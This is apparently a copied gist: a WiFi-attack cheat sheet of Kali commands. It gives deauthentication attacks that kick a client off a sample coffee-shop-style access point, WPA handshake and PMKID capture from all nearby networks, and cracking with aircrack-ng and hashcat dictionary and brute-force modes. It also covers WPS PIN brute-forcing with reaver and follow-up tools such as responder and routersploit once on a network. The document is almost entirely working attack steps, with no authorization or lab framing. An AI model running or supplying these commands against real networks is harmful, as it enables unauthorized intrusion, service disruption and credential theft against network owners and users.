Gist version from https://gist.github.com/faisalfs10x/32631869686f7e03b8a70fc77e8555d2
airmon-ng - To enable/disable monitor mode on wireless interfaces
aireplay-ng - To inject packets into a wireless network, deauthentications attack
airodump-ng - Wireless packet capture tool used for packet capturing of raw 802.11 frames
aircrack-ng - A 802.11 WEP / WPA-PSK key cracker
wash - WiFi Protected Setup Scan Tool
reaver - WPS Pin Cracker/Bruteforcer
airodump-ng --bssid = AP MAC address
airodump-ng --essid/ssid = AP name
airodump-ng -c = channel to listen(focus) on
aireplay-ng -a = AP MAC address
aireplay-ng -c = client MAC address
[C] = compulsory command
[O] = optional command
[O-1] = option 1, run either one option
kali $ sudo airmon-ng check kill
kali $ sudo aireplay-ng --test wlan0
[C] kali $ sudo airmon-ng start wlan0
[O] kali $ sudo airmon-ng start wlan0 8 #Set a wlan0 to the monitor mode on a specified channel
[O] kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up
[O] kali $ sudo airmon-ng OR iwconfig #verify monitor mode is in used
kali $ sudo airodump-ng wlan0 -a --wps
[C] kali $ sudo airodump-ng wlan0 -a --channel 11 --bssid A6:91:A8:02:01:9D
[O] kali $ sudo airodump-ng wlan0 -a --channel 11 --essid 'starbuxk-AP'
[C] Open 1st terminal - Monitor WiFi network & capture a WPA/WPA2 4-way handshake *wait until get WPA-handshake or PMKID found appear
kali $ sudo airodump-ng wlan0 -a -w starbuxk-AP --channel 11 --bssid A6:91:A8:02:01:9D
[C] Open 2nd terminal - deauth attack - kick target client. * -a = AP MAC address, -c = client MAC address
kali $ sudo aireplay-ng wlan0 --deauth 3 -a A6:91:A8:02:01:9D -c 0C:DD:24:9F:F1:91
kali $ aircrack-ng starbuxk.cap
wireshark starbuxk.cap
Wireshark filter 'eapol' to see 4way handshake
kali $ sudo airmon-ng stop wlan0
kali $ sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up
kali $ sudo systemctl restart NetworkManager #enable network manager to be able to connect the WiFi again
kali $ aircrack-ng starbuxk-01.cap -w /usr/share/wordlist/rockyou.txt
kali $ sudo apt install hcxtools
kali $ hcxpcapngtool starbuxk-01.cap -o starbuxk.hc22000
[O-1] windows $ hashcat.exe -O --force -a 0 -w 3 -m 22000 starbuxk.hc22000 rockyou.txt -r .\rules\dive.rule --session=wifi-cracking #dictionary attack mode, possible time.
[O-2] windows $ hashcat.exe -O --force -a 3 -w 3 -m 22000 starbuxk.hc22000 ?a?a?a?a?a?a?a?a?a --session=wifi-cracking #bruteforce mode, only if you have OP GPU, insane time to complete.
kali $ nmcli d wifi connect starbuxk-AP password wireless01
kali $ sudo apt-get update && sudo apt-get -y install hcxtools
kali $ sudo hcxdumptool --enable_status=1 -o hcxdumptool_results.cap -i wlan0 #capturing PMKID hashes for all nearby networks
kali $ hcxpcaptool hcxdumptool_results.cap -k hashes.txt
windows $hashcat.exe -m 22000 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt #dictionary attack against PMKID hashes
[O] Once you get an access to a WiFi network, consider run the following Kali tools and make sure you know what you do ;):
Routersploit against router to check known vulnerabilites
yersinia -G
responder -wF -I 192.168.X.X
wireshark
kali $ sudo airmon-ng start wlan0 #start monitor mode
kali $ sudo wash -a -i wlan0
kali $ sudo reaver --bssid C0:C9:E3:F8:2F:82 --channel 2 --interface wlan0 –vvv - no-associate
kali $ sudo aireplay-ng --fakeauth 30 -a C0:C9:E3:F8:2F:82 -h 00-C0-CA-92-7B-03 wlan0